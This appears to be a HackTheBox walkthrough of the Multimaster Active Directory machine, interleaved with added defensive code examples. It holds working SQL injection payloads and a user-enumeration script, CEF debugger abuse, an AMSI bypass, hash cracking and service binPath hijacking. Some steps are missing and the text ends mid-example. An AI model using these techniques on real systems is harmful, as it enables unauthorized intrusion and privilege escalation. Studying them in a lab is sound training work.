$ nmap -p- --min-rate 5000 10.129.95.200
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-25 22:20 +08
Nmap scan report for 10.129.95.200
Host is up (0.011s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49667/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49678/tcp open unknown
49687/tcp open unknown
49694/tcp open unknown
RDP is available on this machine, which is unusual for HackTheBox machines. I did a detailed nmap scan just in case:
$ sudo nmap -p 53,80,88,135,139,445,464,593,636,3268,3269,3389,5985,9389 -sC -sV -O -min-rate 3000 10.129.95.200
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-25 22:21 +08
Nmap scan report for 10.129.95.200
Host is up (0.013s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: MegaCorp
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-06-25 14:28:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGACORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: MEGACORP
| NetBIOS_Domain_Name: MEGACORP
| NetBIOS_Computer_Name: MULTIMASTER
| DNS_Domain_Name: MEGACORP.LOCAL
| DNS_Computer_Name: MULTIMASTER.MEGACORP.LOCAL
| DNS_Tree_Name: MEGACORP.LOCAL
| Product_Version: 10.0.14393
|_ System_Time: 2023-06-25T14:28:47+00:00
|_ssl-date: 2023-06-25T14:29:27+00:00; +6m55s from scanner time.
| ssl-cert: Subject: commonName=MULTIMASTER.MEGACORP.LOCAL
| Not valid before: 2023-06-24T14:09:53
|_Not valid after: 2023-12-24T14:09:53
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: MULTIMASTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-06-25T14:28:49
|_ start_date: 2023-06-25T14:10:02
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: MULTIMASTER
| NetBIOS computer name: MULTIMASTER\x00
| Domain name: MEGACORP.LOCAL
| Forest name: MEGACORP.LOCAL
| FQDN: MULTIMASTER.MEGACORP.LOCAL
|_ System time: 2023-06-25T07:28:51-07:00
|_clock-skew: mean: 1h30m55s, deviation: 3h07m51s, median: 6m54s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
We can add megacorp.local and multimaster.megacorp.local to our /etc/hosts file for this machine.
SMB Enumeration
SMB does not allow us to access anything without credentials for this machine.
Employee Hub -> SQL Injection
Port 80 shows us a dashboard of some sort:
There were some functions, and the one that stood out was the 'Colleague Finder', which took one name parameter.
If nothing is entered, then all the employees are returned.
We can take note of these usernames for later. More importantly, we should see how this thing processes queries. When viewed in Burp Suite, the page simply sends a POST request to /api/getColleagues and gets a response back.
This looks like it could be vulnerable to SQL injection. Every form of injection I tried resulted in a 403 being returned. I noticed one thing, however: the Content-Type header said that this app accepts UTF-8 characters.
Characters in the JSON body are a bit special, as they can be written as escapes like \u12 instead of literally. If I try to use \u12 as the input, I get an error instead of being blocked.
This likely indicates that our input reached the backend and caused a database error. Using this, we can try some of the sqlmap tampers that are available:
Tampers are scripts that transform the characters of the payload before it is sent to the website. There is a charunicodeescape tamper that we can try. The final command looks something like this:
The initial attempt tells me there is nothing, and that all requests ended in 403. I tried again with a --delay 3 flag in case there was a WAF blocking my access, and it works. The final command I used was:
Guessing the DBMS as MSSQL was purely based on usual HTB machine patterns, but obviously this is not always the case! Web apps on Windows AD hosts can just as well use SQLite3 or MySQL backends!
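To see why the escaped payload slipped past the 403 filter, here is an added example (not the writeup's code) that models a blocklist inspecting the raw request body versus one inspecting the JSON-decoded value, and contrasts the concatenated query with a parameterized one. The blocklist rules, the colleagues table and the use of sqlite3 as a stand-in for the MSSQL backend are all constructed for illustration.

```python
"""Why a raw-body blocklist misses \\u-escaped SQL injection, and the fix.

Added example, not code from the original writeup. The 'WAF' rule, the
sample request bodies and the sqlite3 stand-in for the real MSSQL backend
are all constructed for illustration.
"""
import json
import re
import sqlite3

# Constructed, deliberately naive blocklist of the kind that answers 403 on
# a match. It looks at the request body as raw text.
BLOCKLIST = re.compile(r"'|--|;|\bunion\b|\bselect\b", re.IGNORECASE)


def unicode_escape(text: str) -> str:
    """Rewrite every character as a JSON \\uXXXX escape, which is what the
    sqlmap charunicodeescape tamper does to the payload."""
    return "".join(f"\\u{ord(ch):04x}" for ch in text)


def raw_body_filter_blocks(body: str) -> bool:
    """Check on the raw body: this is the check the escapes slip past."""
    return BLOCKLIST.search(body) is not None


def decoded_filter_blocks(body: str) -> bool:
    """Check after JSON decoding, i.e. on the value the backend really uses."""
    name = json.loads(body)["name"]
    return BLOCKLIST.search(name) is not None


def vulnerable_query(conn, name: str):
    """String concatenation: the attacker's quote closes the literal and the
    rest of the input is parsed as SQL."""
    sql = f"SELECT name, title FROM colleagues WHERE name LIKE '%{name}%'"
    return conn.execute(sql).fetchall()


def safe_query(conn, name: str):
    """Parameterized: the identical input is bound as data, never as SQL."""
    sql = "SELECT name, title FROM colleagues WHERE name LIKE ?"
    return conn.execute(sql, (f"%{name}%",)).fetchall()


def build_db():
    """Constructed in-memory stand-in for the colleague database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE colleagues (name TEXT, title TEXT)")
    conn.executemany("INSERT INTO colleagues VALUES (?, ?)",
                     [("alice", "dev"), ("bob", "ops")])
    return conn


def demo() -> dict:
    """Run one constructed payload through both filters and both queries."""
    # Constructed UNION payload shaped for the two-column sqlite table.
    payload = "x%' UNION SELECT 'leaked','data'--"
    plain_body = json.dumps({"name": payload})
    escaped_body = '{"name":"' + unicode_escape(payload) + '"}'
    conn = build_db()
    return {
        "plain_blocked_raw": raw_body_filter_blocks(plain_body),
        "escaped_blocked_raw": raw_body_filter_blocks(escaped_body),
        "escaped_blocked_decoded": decoded_filter_blocks(escaped_body),
        "decoded_equals_payload": json.loads(escaped_body)["name"] == payload,
        "vulnerable_rows": vulnerable_query(conn, payload),
        "safe_rows": safe_query(conn, payload),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two results that matter to a defender are the last two: the application decodes the JSON before it builds the query, so inspecting the raw body is a losing game, while a bound parameter makes the identical input return nothing. A decoded-value check is at best a detection aid, not a fix.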
[22:58:39] [INFO] (custom) POST parameter 'JSON #1*' appears to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable
[22:59:04] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:59:17] [INFO] target URL appears to have 5 columns in query
[23:00:51] [INFO] (custom) POST parameter 'JSON #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) POST parameter 'JSON #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 70 HTTP(s) requests:
---
Parameter: JSON #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"name":"' AND 4943=4943-- fsuJ"}
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: {"name":"';WAITFOR DELAY '0:0:5'--"}
Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: {"name":"' WAITFOR DELAY '0:0:5'-- tWyh"}
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: {"name":"-5737' UNION ALL SELECT 68,68,68,CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(99)+CHAR(103)+CHAR(105)+CHAR(67)+CHAR(121)+CHAR(77)+CHAR(74)+CHAR(122)+CHAR(117)+CHAR(85)+CHAR(75)+CHAR(99)+CHAR(110)+CHAR(99)+CHAR(76)+CHAR(72)+CHAR(99)+CHAR(70)+CHAR(69)+CHAR(77)+CHAR(120)+CHAR(120)+CHAR(107)+CHAR(106)+CHAR(68)+CHAR(103)+CHAR(66)+CHAR(101)+CHAR(104)+CHAR(118)+CHAR(89)+CHAR(79)+CHAR(117)+CHAR(78)+CHAR(113)+CHAR(76)+CHAR(101)+CHAR(67)+CHAR(71)+CHAR(100)+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(106)+CHAR(113),68-- wUMy"}
Great! Now that we have this, we can attempt to enumerate the database. Here are the results from repeated use of sqlmap:
I found this rather odd. I ran kerbrute to find more users, and the users it found differed from those in the database.
None of the users that I found via kerbrute worked with any of the passwords either. So we were just left with an SQL injection on an MSSQL database. Googling for AD enumeration via MSSQL injection led me to this page:
Basically, it is possible for us to find valid usernames using the MSSQL injection that we have found. Earlier, sqlmap indicated that there were 5 columns present, and that UNION injection worked. Following the above PoC, we can use this payload:
a' union select 1,1,1,1,(select default_domain())--
I used this site to encode it into the escaped format the API accepts:
Testing it worked!
We can then try to enumerate the Administrator user using this payload:
a' union select 1,1,1,1,(select sys.fn_varbintohexstr(SUSER_SID('megacorp\Administrator')))--
This would result in some hex being returned:
We can use this to send another query that would return usernames and convert the SID for us.
a' union select 1,1,1,1,SUSER_SNAME(0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000)--
Now, we just need a way to automate this method. I took the two functions that convert the hex SID into a string SID from the page linked earlier.
Then, we can fit this SID into a payload with a test RID of 1000.
a' union select 1,1,1,1,(SUSER_SNAME(SID_BINARY('S-1-5-21-3167813660-1240564177-918740779-1000')))--
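To make the SID arithmetic above concrete, here is an added example (not the writeup's script) that decodes the hex returned by SUSER_SID into its string form and packs it back the way T-SQL's SID_BINARY() does, splitting off the domain prefix and RID along the way. The well-known RID table is standard Windows knowledge; the hex value is the one the writeup obtained, and nothing else is assumed.

```python
"""Windows SID <-> binary round trip, as used by SID_BINARY/SUSER_SNAME above.

Added example, not the writeup's own code. ADMIN_SID_HEX is the value the
SUSER_SID query in the writeup returned; the RID table is standard Windows
knowledge.
"""
import struct

# A handful of well-known RIDs so a decoded SID can be read at a glance.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    519: "Enterprise Admins",
}

ADMIN_SID_HEX = "0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000"


def sid_to_str(raw: bytes) -> str:
    """Decode the binary layout: revision byte, sub-authority count byte,
    48-bit big-endian identifier authority, then little-endian 32-bit
    sub-authorities (the last of which is the RID)."""
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from(f"<{count}I", raw, 8)
    return "S-{}-{}-{}".format(revision, authority,
                               "-".join(str(s) for s in subs))


def str_to_sid(sid: str) -> bytes:
    """Inverse of sid_to_str: the bytes T-SQL's SID_BINARY() would produce."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("not a SID string")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)])
            + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def split_domain_rid(sid: str):
    """Domain SID prefix and the trailing RID of an account SID."""
    prefix, _, rid = sid.rpartition("-")
    return prefix, int(rid)


def describe(hex_sid: str) -> dict:
    """Decode a hex SID (with or without the 0x prefix) and check the round trip."""
    raw = bytes.fromhex(hex_sid[2:] if hex_sid.startswith("0x") else hex_sid)
    sid = sid_to_str(raw)
    domain, rid = split_domain_rid(sid)
    return {
        "sid": sid,
        "domain_sid": domain,
        "rid": rid,
        "well_known": WELL_KNOWN_RIDS.get(rid),
        "round_trip_ok": str_to_sid(sid) == raw,
    }


if __name__ == "__main__":
    for key, value in describe(ADMIN_SID_HEX).items():
        print(f"{key}: {value}")
```

Decoding the hex gives S-1-5-21-3167813660-1240564177-918740779-500, i.e. the domain SID prefix the writeup's loop is built on, with RID 500 confirming it belongs to the built-in Administrator. From the defender's side this is exactly why the application's database login should run with the least privilege the site needs and why the query must be parameterized: SUSER_SNAME works for any login, so once arbitrary SQL runs, the whole domain's account list is one loop away.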
This is the final script I used to automate this method:
import requests
import json
import sys
import struct
import time

# Decode the hex SID returned by SUSER_SID() and keep only the domain part
# (the first seven dash-separated fields), ready for a RID to be appended.
def prepare_sid(sid):
    hex_string = bytes.fromhex(sid[2:])
    mod_sid = sid_to_str(hex_string)
    domain_sid_data = mod_sid.split('-')[:7]
    domain_sid = '-'.join(domain_sid_data) + "-"
    print(domain_sid + "\n")
    return domain_sid

# Build out the SID string from the binary layout: revision byte, sub-authority
# count, 48-bit big-endian identifier authority, 32-bit little-endian sub-authorities.
def sid_to_str(sid):
    if sys.version_info.major < 3:
        revision = ord(sid[0])
    else:
        revision = sid[0]
    if sys.version_info.major < 3:
        number_of_sub_ids = ord(sid[1])
    else:
        number_of_sub_ids = sid[1]
    iav = struct.unpack('>Q', b'\x00\x00' + sid[2:8])[0]
    sub_ids = [struct.unpack('<I', sid[8 + 4 * i:12 + 4 * i])[0] for i in range(number_of_sub_ids)]
    return 'S-{0}-{1}-{2}'.format(revision, iav, '-'.join([str(sub_id) for sub_id in sub_ids]))

# Rewrite every character of the payload as a JSON \u00XX escape so the request is not blocked.
def utfme(text):
    val = []
    for i in text:
        val.append("\\u00" + hex(ord(i)).split("x")[1])
    return ''.join(val)

sid = prepare_sid('0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000')
url = 'http://megacorp.local/api/getColleagues'
for i in range(500, 10000):
    payload = f"a' union select 1,1,1,1,(SUSER_SNAME(SID_BINARY('S-1-5-21-3167813660-1240564177-918740779-{i}')))--"
    encoded_payload = utfme(payload)
    r = requests.post(url, data='{"name":"' + encoded_payload + '"}', headers={'Content-Type': 'Application/json'})
    data = json.loads(r.text)
    try:
        # A resolved SID comes back as DOMAIN\name in the 'src' field; anything else means no account with that RID.
        username = data[0]['src'].split('\\')[1]
        print(username)
    except (IndexError, KeyError, TypeError):
        print('nope!')
    time.sleep(3)
This would slowly brute force all the users out. I included the 'nope!' part to let me know that the script was still running fine. This script takes quite long, but eventually we would get some valid users. Here's what the output of my script looks like:
There are a lot of groups starting at 500, so I changed it up and started at 1000 instead, which is where user RIDs should start. Because this was taking so long, every time I found a valid user I would test the credentials immediately. Eventually, it found these users:
...
DnsUpdateProxy
svc-nas
nope!
Privileged IT Accounts
nope!
nope!
nope!
nope!
tushikikatomo
andrew
lana
...
The current user had no privileges or anything of interest. Since we had a shell, we can do some basic enumeration like finding the other users present:
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/7/2020 7:24 PM .NET v4.5
d----- 1/7/2020 7:24 PM .NET v4.5 Classic
d----- 1/9/2020 3:18 AM Administrator
d----- 3/9/2020 3:20 AM alcibiades
d----- 3/9/2020 2:53 AM cyork
d----- 1/9/2020 5:14 PM jorden
d----- 3/7/2020 8:38 AM MSSQLSERVER
d-r--- 11/20/2016 5:24 PM Public
d----- 1/9/2020 5:12 PM sbauer
d----- 3/7/2020 8:38 AM SQLTELEMETRY
In the C:\ directory, there were some interesting folders:
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 12:41 PM DFSRoots
d----- 1/7/2020 7:23 PM inetpub
d----- 9/25/2019 5:01 AM PerfLogs
d-r--- 7/19/2021 1:07 AM Program Files
d----- 1/9/2020 1:18 PM Program Files (x86)
d-r--- 1/9/2020 5:14 PM Users
d----- 7/19/2021 1:29 AM Windows
The DFSRoots directory gives me a weird error about the network location:
*Evil-WinRM* PS C:\DFSRoots\dfs\Development> dir
The network location cannot be reached. For information about network troubleshooting, see Windows Help.
At line:1 char:1
+ dir
+ ~~~
+ CategoryInfo : ReadError: (C:\DFSRoots\dfs\Development:String) [Get-ChildItem], IOException
+ FullyQualifiedErrorId : DirIOError,Microsoft.PowerShell.Commands.GetChildItemCommand
We probably don't have the permissions for this yet. We also cannot access the inetpub directory:
*Evil-WinRM* PS C:\inetpub\wwwroot> dir
Access to the path 'C:\inetpub\wwwroot' is denied.
At line:1 char:1
+ dir
+ ~~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\wwwroot:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Within the C:\Program Files directory, we can see that Microsoft Visual Studio is installed.
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:59 AM Common Files
d----- 1/9/2020 2:39 PM Internet Explorer
d----- 1/7/2020 9:40 PM Microsoft
da---- 1/7/2020 7:47 PM Microsoft SQL Server
d----- 1/7/2020 7:26 PM Microsoft Visual Studio 10.0
da---- 1/9/2020 3:18 AM Microsoft VS Code
d----- 1/7/2020 7:27 PM Microsoft.NET
d----- 1/7/2020 9:43 PM Reference Assemblies
d----- 7/19/2021 1:07 AM VMware
d-r--- 1/9/2020 2:46 PM Windows Defender
d----- 1/9/2020 2:39 PM Windows Mail
d----- 1/9/2020 2:39 PM Windows Media Player
d----- 7/16/2016 6:23 AM Windows Multimedia Platform
d----- 7/16/2016 6:23 AM Windows NT
d----- 1/9/2020 2:39 PM Windows Photo Viewer
d----- 7/16/2016 6:23 AM Windows Portable Devices
d----- 7/16/2016 6:23 AM WindowsPowerShell
Microsoft SQL Server is also not installed by default. Before we delve further into any specific software, I wanted to run bloodhound-python to get more information about the domain.
$ bloodhound-python -d megacorp.local -u tushikikatomo -p 'finance1' -c all -ns 10.129.95.200
INFO: Found AD domain: megacorp.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: MULTIMASTER.MEGACORP.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: MULTIMASTER.MEGACORP.LOCAL
INFO: Found 28 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 10 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MULTIMASTER.MEGACORP.LOCAL
INFO: Done in 00M 02S
Start BloodHound and upload the information as usual. Then, we can check each user from the C:\Users directory for ACLs to abuse.
First, we find that cyork is part of the Developers group:
There are no outbound object controls for this group, indicating that it might instead have access to some stuff on the machine itself.
We can also find that the sbauer user has some privileges over jorden.
The rest of the users don't have anything interesting about them. I also used PrivescCheck.ps1 to do the enumeration, since WinPEAS was not working for some reason. Here was the interesting output:
+------+------------------------------------------------+------+
| TEST | APPS > Non-default Apps | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate non-default and third-party applications by |
| | parsing the registry. |
+------+-------------------------------------------------------+
[*] Found 8 result(s).
Name FullName
---- --------
Microsoft SQL Server C:\Program Files (x86)\Microsoft SQL Server
Microsoft Visual Studio 10.0 C:\Program Files (x86)\Microsoft Visual Studio 10.0
Microsoft C:\Program Files\Microsoft
Microsoft SQL Server C:\Program Files\Microsoft SQL Server
Microsoft Visual Studio 10.0 C:\Program Files\Microsoft Visual Studio 10.0
Microsoft VS Code C:\Program Files\Microsoft VS Code
VMware C:\Program Files\VMware
VMware Tools C:\Program Files\VMware\VMware Tools
+------+------------------------------------------------+------+
| TEST | APPS > Running Processes | INFO |
+------+------------------------------------------------+------+
| DESC | List processes that are not owned by the current user |
| | and filter out common processes such as |
| | 'svchost.exe'. |
+------+-------------------------------------------------------+
[*] Found 37 result(s).
Name Id Path SessionId User
---- -- ---- --------- ----
Code 988 1
Code 2252 1
Code 2272 1
Code 3172 1
Code 4628 1
Code 5260 1
Code 5304 1
Code 5484 1
Code 5488 1
Code 6036 1
IPv4 TCP 127.0.0.1:18256 LISTENING 2252 Code
IPv4 TCP 127.0.0.1:30980 LISTENING 5304 Code
IPv4 TCP 127.0.0.1:46973 LISTENING 5032 Code
For some reason, Visual Studio Code was running a lot of processes and even had some ports listening.
VS Code -> Cyork Shell
There were loads of processes running as Code, so let's take a look at that. The VS Code directory had some files within it.
Within the Microsoft VS Code directory, there was a Code.exe binary present, and I found this StackOverflow post that gave me the command to find its version (I was struggling to run .\Code.exe --version previously).
*Evil-WinRM* PS C:\Program Files\Microsoft VS Code> (Get-Command .\code.exe).version
Major Minor Build Revision
----- ----- ----- --------
1 37 1 0
Then, we can enumerate the possible exploits.
This machine was released in 2020, so we can ignore the 2023 exploits. There was only one privilege escalation exploit, which looked promising as it involved injecting code into existing processes.
The exploit abuses the debug ports that the process leaves open, and we should be able to get RCE in the user context that Code.exe runs in.
VS Code is built on Electron, so we should be looking for tooling that is able to communicate with the port that is open. On HackTricks, there's a page detailing CEF debug abuse using cefdebug.exe.
We can grab a copy of the compiled binary and transfer it to the machine. We can first run it to find the target port we want.
*Evil-WinRM* PS C:\users\alcibiades> .\cefdebug.exe
cefdebug.exe : [2023/06/25 22:49:29:8700] U: There are 3 tcp sockets in state listen.
+ CategoryInfo : NotSpecified: ([2023/06/25 22:...n state listen.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
[2023/06/25 22:49:49:9161] U: There were 1 servers that appear to be CEF debuggers.
[2023/06/25 22:49:49:9161] U: ws://127.0.0.1:52954/0c8874f7-9688-4ce6-ae33-973747ba8969
This exploit was weird, as it took me ages to get a shell, but I eventually did.
The Web.Config file doesn't seem to use it, making it weirder. I downloaded this file back to my machine for some reverse engineering. Since it was a DLL file, we can open it up in dnSpy.exe.
Within it, we can find some hardcoded credentials:
Since we have access to the C:\Users directory, we can check which user this password is valid for, and sbauer is the one!
$ crackmapexec smb megacorp.local -u sbauer -p 'D3veL0pM3nT!'
SMB megacorp.local 445 MULTIMASTER [*] Windows Server 2016 Standard 14393 x64 (name:MULTIMASTER) (domain:MEGACORP.LOCAL) (signing:True) (SMBv1:True)
SMB megacorp.local 445 MULTIMASTER [+] MEGACORP.LOCAL\sbauer:D3veL0pM3nT!
We can then evil-winrm in as this user:
GenericWrite -> Jorden Shell
From the BloodHound run we did earlier, we can see that this user has GenericWrite privileges over jorden:
To exploit this, we can use PowerView.ps1. However, it seems AMSI is blocking us:
*Evil-WinRM* PS C:\Users\sbauer\Documents> . .\Power.ps1
At C:\Users\sbauer\Documents\Power.ps1:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At C:\Users\sbauer\Documents\Power.ps1:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
This is pretty easy to bypass since we have an evil-winrm shell. We can just use Bypass-4MSI to do so:
$ john --wordlist=/usr/share/wordlists/rockyou.txt asrep_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rainforest786 ($krb5asrep$23$jorden@MEGACORP)
1g 0:00:00:02 DONE (2023-06-26 14:33) 0.3484g/s 1533Kp/s 1533Kc/s 1533KC/s rainian..raincole
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Server Operators -> Root
jorden has loads of privileges available and is part of a lot of groups:
*Evil-WinRM* PS C:\Users\jorden\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
*Evil-WinRM* PS C:\Users\jorden\Documents> net user jorden
User name jorden
Full Name Jorden Mclean
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:48:17 PM
Password expires Never
Password changeable 1/10/2020 5:48:17 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/25/2023 11:39:57 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Server Operators
Global Group memberships *Domain Users *Developers
Technically, SeBackupPrivilege allows us to read the root.txt directly, but getting an admin shell is of course better. So since we are part of the Server Operators group, we can start our enumeration from there.
From Hacktricks, I gathered that the Server Operators group was able to do these:
None of these are super interesting, except for the last one. We can control local services, meaning that we can do stuff like change service paths to run payloads as the SYSTEM user. As such, I used PowerUp.ps1 to check which services I could manipulate.
This didn't work because it seems that we cannot access the Service Control Manager:
*Evil-WinRM* PS C:\> sc.exe query type= service
[SC] OpenSCManager FAILED 5:
Access is denied.
I couldn't run WinPEAS on the machine, so I used my own Windows host to find a service that we could edit, and this took a while.
We can find all the services using reg query:
*Evil-WinRM* PS C:\Users\jorden\Documents> reg query HKLM\system\currentcontrolset\services
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NET CLR Data
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NET CLR Networking
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NET CLR Networking 4.0.0.0
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NET Data Provider for Oracle
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NET Data Provider for SqlServer
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NET Memory Cache 4.0
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NETFramework
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\1394ohci
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\3ware
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\ACPI
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\AcpiDev
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\acpiex
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\acpipagr
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\AcpiPmi
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\acpitime
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\ADOVMPPackage
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\ADP80XX
<TRUNCATED>
Within this huge list, there were loads of services that weren't valid to use because they were already running or I could not edit the binPath variable.
I used 0xdf's writeup because I got lazy finding the service, lol.
The first services I noticed were browser and bowser. I just thought the latter was funny, but the former was one that we could abuse. First, we just need to change the binPath and then run start to start it again. This gives us a root shell.
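Enumerating services through the registry cuts both ways: the same ImagePath values an attacker reads to pick a target are what a defender can baseline and watch. The following is an added example, not part of the writeup, that parses output in the shape of reg query ... /s and flags ImagePath values that differ from a known-good baseline, launch an interpreter, are unquoted with spaces, or point into user-writable locations. The sample export, the baseline, and every service name other than browser are constructed for illustration.

```python
"""Offline audit of service ImagePath values from a registry export.

Added example written from the defender's side, not the writeup's own code.
SAMPLE_REG_EXPORT and BASELINE are constructed in the format of
'reg query HKLM\\system\\currentcontrolset\\services /s' output; the service
names other than browser and all paths are made up for illustration.
"""
import re
from pathlib import PureWindowsPath

# Constructed sample export: one benign service, one legitimate third-party
# service with a quoting defect, and one whose ImagePath has been replaced.
SAMPLE_REG_EXPORT = r"""
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\browser
    DisplayName    REG_SZ    @%systemroot%\system32\browser.dll,-100
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\System32\svchost.exe -k netsvcs
    Start    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\system\currentcontrolset\services\ExampleUpdater
    ImagePath    REG_EXPAND_SZ    C:\Program Files\Example App\updater.exe
    Start    REG_DWORD    0x2

HKEY_LOCAL_MACHINE\system\currentcontrolset\services\Tampered
    ImagePath    REG_EXPAND_SZ    C:\Windows\System32\cmd.exe /c C:\Users\Public\run.bat
    Start    REG_DWORD    0x3
"""

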